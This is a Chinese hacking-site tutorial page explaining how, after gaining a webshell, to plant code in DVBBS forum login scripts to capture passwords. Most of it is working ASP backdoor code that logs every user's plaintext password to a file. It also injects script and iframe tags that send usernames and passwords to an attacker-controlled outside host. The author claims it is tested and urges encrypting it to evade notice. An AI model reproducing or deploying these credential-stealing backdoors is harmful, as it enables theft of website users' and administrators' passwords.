欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

拓展思路拿DVBBS帐号

  • 软件大小:2.95 MB
  • 软件语言:简体中文
  • 软件类型:最新综合教程
  • 软件授权:免费教程
  • 更新时间:2005-10-18
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

拓展思路拿DVBBS帐号软件介绍

###############################################################
#                 一个人的圣经                                #                           
#                 qq:157393026                                #
# 欢迎访问 http://www.hkstudy.cn/ 中国菜鸟基地 菜鸟学习的乐园 #
###############################################################

我以DVBBS系统为例子来展开这个动画
需要两个webshell完成演示
以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了laner.txt,里面就记录了明文密码
我们实验一下,看有没有记录 用户名和密码都是123456
速度有点慢

这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。

下面补充几种办法:

方法一:login.asp中Case "login_chk"下:
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing

这样laner.asp将获得全部登陆人的登陆时间,用户名和密码
 
方法二:如果你有自己的网站或者另外的webshell(强烈建议使用):

可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>

在login.asp那里插入一句:
response.write "<script src=http://www.ptlushi.com/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></script>"
response.write "<iframe src=http://你网站/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></iframe>"
结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里

这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高。

上面的方法,利用的地方很多,不局限于DVBBS,大家可以自己去摸索一下,毕竟要把别人的技术变成自己的就要好好拓展别人的思路来研究。

以上所有提供的代码均测试通过,建议加密使用

88